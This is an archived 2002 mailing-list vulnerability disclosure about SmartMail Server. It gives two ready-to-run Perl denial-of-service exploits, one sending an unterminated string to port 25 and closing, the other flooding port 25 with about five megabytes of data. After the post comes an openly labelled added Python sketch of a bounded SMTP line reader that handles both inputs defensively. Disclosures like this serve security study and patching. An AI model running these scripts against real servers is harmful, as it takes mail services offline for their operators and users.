SmartMail server DOS

From: securma massine (securmaat_private)
Date: Thu Oct 31 2002 - 09:26:03 PST


    hi
    
    SmartMail Server (http://www.virtualzone.de/smartmail/) is
    a full-featured e-mail server. It can be
    run on any 32-bit compatible Microsoft Windows machine and
    complies with the standards of SMTP, POP3 and HTTP
    (web interface).
    SmartMail offers two versions of SmartMail Server; I found
    that the two versions were vulnerable to a DoS attack.
     1- SmartMail Server 2.0 Interim Build 83: closing the
    connection while sending data causes an
    "Access violation at address 0046CBCC in
    module 'smartsvr.exe' write of address 76756f4e". That is
    exactly the same vulnerability that I discovered
    concerning popwerft, and the exploit has the same effect on
    the two programs.
     exploit:
    
    
    #!/usr/bin/perl -w
    # greetz: marocit and #crack.fr (christal)
    # securmaat_private
    use Socket;

    if (not $ARGV[0]) {
        print qq~
            Usage: sm.pl <host>
        ~;
        exit;
    }

    $ip = $ARGV[0];
    print "SmartMail server 2.0 DoS\n\n";
    print "Sending Exploit Code to host: " . $ip . "\n\n";
    sendexplt("MASSINE");

    sub sendexplt {
        my ($pstr) = @_;
        $target = inet_aton($ip) || die("inet_aton problems");
        socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) ||
            die("Socket problems\n");
        # Connect to port 25, send the string with no line terminator,
        # wait 3 seconds, then close the connection.
        if (connect(S, pack "SnA4x8", 2, 25, $target)) {
            select(S);
            $| = 1;
            print $pstr;
            sleep 3;
            close(S);
        } else { die("Can't connect...\n"); }
    }
    
    
    
     2- SmartMail Server 1.0 BETA 10: sending it 5MG of data on
    port 25 or 110 causes the shutdown of all the services
    (pop/smtp/webinterface).
     exploit:
    #!/usr/bin/perl -w
    # tool smartdos.pl
    # securmaat_private
    # Greetz: marocit and #crack.fr (especially christal.)
    #
    use IO::Socket;

    if ($#ARGV < 0) {
        print "\n write the target IP!\n\n";
        exit;
    }

    # One unterminated run of 5099999 bytes, sent to port 25.
    $buffer = "A" x 5099999;
    $connect = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => "$ARGV[0]",
        PeerPort => "25",
    );
    unless ($connect) { die "cant connect $ARGV[0]" }
    print $connect "$buffer";
    print "\nsending exploit......\n\n";
    
    
    
    securmaat_private
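
Both reports describe input a mail server must tolerate: a client that hangs up before finishing a line, and a line that never ends. The following is an added example, not part of the original post or of SmartMail's code: a bounded command-line reader that returns a status for each case instead of buffering without limit. The names `read_command` and `simulate`, the status labels, and the use of RFC 5321's 512-octet command-line limit as the cap are assumptions of this sketch; bytes after the first CRLF are discarded for brevity.

```python
import socket
import threading

MAX_LINE = 512  # RFC 5321 command-line limit, CRLF included (assumed cap)

def read_command(conn, timeout=5.0):
    """Read one CRLF-terminated command line from a client socket.
    Returns (status, data); status is "ok", "closed" (peer hung up before
    CRLF), "too_long" (cap reached) or "timeout". Never holds > MAX_LINE bytes.
    """
    conn.settimeout(timeout)
    buf = bytearray()
    while True:
        try:
            chunk = conn.recv(MAX_LINE - len(buf))
        except socket.timeout:
            return "timeout", bytes(buf)
        except OSError:              # reset by peer: treat as a hang-up
            return "closed", bytes(buf)
        if not chunk:                # orderly close in the middle of a line
            return "closed", bytes(buf)
        buf += chunk
        end = buf.find(b"\r\n")
        if end != -1:
            return "ok", bytes(buf[:end])
        if len(buf) >= MAX_LINE:     # stop reading; caller drops the session
            return "too_long", bytes(buf)

def simulate(payload):
    """Constructed harness: a local socketpair stands in for the client."""
    server, client = socket.socketpair()
    def send():
        try:
            client.sendall(payload)
        except OSError:
            pass                     # server dropped the session mid-send
        finally:
            client.close()
    t = threading.Thread(target=send)
    t.start()
    status, data = read_command(server, timeout=2.0)
    server.close()
    t.join()
    return status, len(data)

if __name__ == "__main__":
    for p in (b"HELO example.test\r\n", b"MASSINE", b"A" * 5099999):
        print(simulate(p))
```
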
    
    
    



    This archive was generated by hypermail 2b30 : Thu Oct 31 2002 - 09:26:05 PST